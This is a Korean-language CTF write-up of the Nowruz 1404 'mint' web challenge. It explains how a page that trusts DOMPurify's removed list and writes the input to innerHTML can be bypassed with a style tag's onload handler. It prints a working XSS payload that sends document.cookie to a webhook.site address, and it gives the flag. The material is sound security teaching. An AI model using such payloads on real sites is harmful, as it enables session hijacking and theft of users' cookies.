Home
/
System Hacking
WEB Hacking
Writeup
/
๐ŸŒฑ

๐ŸŒฑ

Type
CTF
๋…„๋„
2025
Name
Nowruz 1404
๋ถ„์•ผ
WEB
์„ธ๋ถ€๋ถ„์•ผ
XXS
์—ด
2025/03/20 05:36
1 more property

# Description

If nothing is removed, then it is surely safe. Hint: wait, why <script>1337</script> works??? App: https://mint-chall.fmc.tf/ Admin bot: https://mint-bot.fmc.tf/
Plain Text
๋ณต์‚ฌ

# ๋ถ„์„

# File

chall.html
ํ•ด๋‹น html ํŒŒ์ผ์„ ํ•˜๋‚˜ ์ค€๋‹ค.
DOMPurify๋ฅผ ๋จผ์ €๋ณด๋ฉด ์•„๋ž˜์˜ ๋งํฌ์—์„œ ์†Œ์Šค์ฝ”๋“œ๋ฅผ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.
DOMPurify
cure53
์ผ๋‹จ ๋ญ” library์ธ์ง€ ํ™•์ธํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™๋‹ค๊ณ  ๋งํ•ด์ค€๋‹ค.
DOMPurify๋Š” HTML์„ ์ •ํ™”ํ•˜๊ณ  XSS ๊ณต๊ฒฉ์„ ๋ฐฉ์ง€ํ•˜๋Š” ์—ญํ• ์„ ํ•ฉ๋‹ˆ๋‹ค. DOMPurify์— ์œ„ํ—˜ ์š”์†Œ๊ฐ€ ๊ฐ€๋“ํ•œ โ€œ๋”๋Ÿฌ์šดโ€ HTML ๋ฌธ์ž์—ด์„ ๋„˜๊ธฐ๋ฉด, ํŠน๋ณ„ํ•œ ์„ค์ •์ด ์—†๋Š” ํ•œ ์•ˆ์ „ํ•˜๊ฒŒ ์ •์ œ๋œ HTML ๋ฌธ์ž์—ด์„ ๋Œ๋ ค์ค๋‹ˆ๋‹ค. DOMPurify๋Š” ์œ„ํ—˜ํ•œ HTML์ด ํฌํ•จ๋œ ๋ชจ๋“  ์š”์†Œ๋ฅผ ์ œ๊ฑฐํ•ด XSS ๊ณต๊ฒฉ์„ ๋น„๋กฏํ•œ ์—ฌ๋Ÿฌ ์œ ํ•ด ์š”์†Œ๋ฅผ ๋ง‰์•„๋ƒ…๋‹ˆ๋‹ค. ๋˜ํ•œ ์ฒ˜๋ฆฌ ์†๋„๋„ ๋งค์šฐ ๋น ๋ฆ…๋‹ˆ๋‹ค. ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ œ๊ณตํ•˜๋Š” ๊ธฐ์ˆ ์„ ํ™œ์šฉํ•˜์—ฌ ์ด๋ฅผ XSS ํ•„ํ„ฐ๋กœ ๋งŒ๋“ค์–ด ์“ฐ๋ฉฐ, ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ๋น ๋ฅผ์ˆ˜๋ก DOMPurify ์—ญ์‹œ ๋” ๋นจ๋ฆฌ ๋™์ž‘ํ•ฉ๋‹ˆ๋‹ค.
์ผ๋‹จ ์†Œ์Šค ์ฝ”๋“œ๋ฅผ ๋จผ์ € ๋‹ค์šด๋กœ๋“œ ๋ฐ›์•„์„œ ๋ถ„์„์„ ์•ฝ๊ฐ„ ์ง„ํ–‰ํ•˜๊ธฐ ์œ„ํ•ด์„œ ์•„๋ž˜์˜ ์‚ฌ์ดํŠธ์—์„œ ๋™์ผํ•œ ๋ฒ„์ „์˜ DOMPurify๋ฅผ ๋‹ค์šด๋ฐ›์•„์ค€๋‹ค.
GitHub - cure53/DOMPurify at 3.2.3
DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks. Demo: - GitHub - cure...
https://github.com/cure53/DOMPurify/tree/3.2.3
์†Œ์Šค ์ฝ”๋“œ์˜ ๋™์ž‘์„ ๋Œ€๋žต์ ์œผ๋กœ ์ดํ•ดํ•œ ๋’ค ๋‹ค์‹œ ๋ฌธ์ œ์—์„œ ์›ํ•˜๋Š” ์š”๊ตฌ ์‚ฌํ•ญ์„ ์ •๋ฆฌํ•˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™๋‹ค.
1.
p๋กœ ๋“ค์–ด์˜จ GET Parameter๋ฅผ ๊ฐ€์ ธ์™€์„œ ๋์— โ€œโ€์„ ๋ถ™์—ฌ์ค€๋‹ค.
2.
DOMPurify.sanitize ํ•จ์ˆ˜ ์‹คํ–‰
3.
DOMPurify.removed.length ์ฆ‰ removed๊ฐ€ ๋œ ๊ฒƒ์ด ์—†์œผ๋ฉด xss.innerHTML์— p๋ฅผ ๋„ฃ๋Š”๋‹ค.

innerHTML Bypass

innerHTML์˜ ๊ฒฝ์šฐ ๊ฑฐ๊ธฐ์— ํฌํ•จ๋˜์–ด ์žˆ๋Š” <script></script>๋Š” ์‹คํ–‰๋˜์ง€ ์•Š๋Š”๋‹ค๊ณ  ์•„๋ž˜์˜ HTML Standard์—์„œ ์ •์˜๋˜์–ด์žˆ๋‹ค.
HTML Standard
Authors are encouraged to use declarative alternatives to scripting where possible, as declarative mechanisms are often more maintainable, and many users disable scripting.
https://html.spec.whatwg.org/multipage/scripting.html#:~:text=inserted%20using%20the-,innerHTML,-and%20outerHTML%20attributes
When inserted using theย document.write()ย method,ย scriptย elementsย usuallyย execute (typically blocking further script execution or HTML parsing). When inserted using theย innerHTMLย andย outerHTMLย attributes, they do not execute at all.
์ด๋ฅผ ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” <img> ํƒœ๊ทธ์™€ ๋™์ผํ•˜๊ฒŒ src ์†์„ฑ์„ ์ด์šฉํ•ด์„œ ์™ธ๋ถ€๋กœ ๋ถ€ํ„ฐ ๋ฐ์ดํ„ฐ๋ฅผ ์š”์ฒญํ•˜๋Š” ํƒœ๊ทธ๋ฅผ ์ด์šฉํ•˜๋Š” ๊ฒƒ๋“ค์„ ์ฐพ์•„์„œ onerror, onload์™€ ๊ฐ™์€ ์†์„ฑ์„ ์ด์šฉํ•˜์—ฌ Bypass๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค.

DOMPurify.sanitize Bypass

<script> let p = ((new URLSearchParams(location.search)).get('p') ?? '')+`๐ŸŒฑ` DOMPurify.sanitize(p) if(!DOMPurify.removed.length) xss.innerHTML = p </script>
HTML
๋ณต์‚ฌ
์ฝ”๋“œ์˜ ํ•ต์‹ฌ์„ ๋ณด๋ฉด xss.innerHTML์— ๋„ฃ์–ด์ฃผ๋Š” ๊ฒƒ์€ ์šฐ๋ฆฌ๊ฐ€ ์ž…๋ ฅํ•œ p ๊ฐ’์„ ๋„ฃ์–ด์ค€๋‹ค.
๋‹ค์‹œ๋งํ•ด DOMPurify.sanitize(p)๋ฅผ ์ง„ํ–‰ํ•ด๋„ DOMPurify.removed.length์ด ๋˜๋Š” Tag๋ฅผ ์ฐพ๊ณ  ํ•ด๋‹น Tag์— onload attribute๋งŒ ์ง€์›ํ•˜๋Š”์ง€ ํ™•์ธํ•ด์„œ ํ•ด๋‹น Tag๋ฅผ ์ด์šฉํ•ด์„œ ๊ณต๊ฒฉ์„ ์ง„ํ–‰ํ•˜๋ฉด ๋œ๋‹ค.

DOMPurify.removed.length Bypass

DOMPurify ์†Œ์Šค ์ฝ”๋“œ๋ฅผ ๋ถ„์„ํ•˜๋ฉด ๋Œ€๋žต์ ์œผ๋กœ DOMPurify์—์„œ removed๋˜์ง€ ์•Š๋Š” ํƒœ๊ทธ๋ฅผ ์•Œ์•„๋‚ผ ์ˆ˜ ์žˆ๋‹ค.
๋Œ€ํ‘œ์ ์œผ๋กœ <script>, <style> ํƒœ๊ทธ๊ฐ€ ์กด์žฌํ•œ๋‹ค.
โ€ข
<script>
script ํƒœ๊ทธ์˜ ๊ฒฝ์šฐ onload์™€ ๊ฐ™์€ ์†์„ฑ์„ ์ง€์›ํ•˜์ง€ ์•Š๋Š”๋‹ค.
โ€ข
<style>
onload ์†์„ฑ์„ ์ง€์›ํ•œ๋‹ค.

# Payload

https://mint-chall.fmc.tf/?p=<style%20onload='location.href=`https://webhook.site/455194c0-8a95-453f-9240-a8498b46151c%3Fq%3D`%2Bbtoa(document.cookie)'></style>
HTML
๋ณต์‚ฌ

# Flag

FMCTF{a266b251865bb2627f945165a12598aa}
Plain Text
๋ณต์‚ฌ
Made with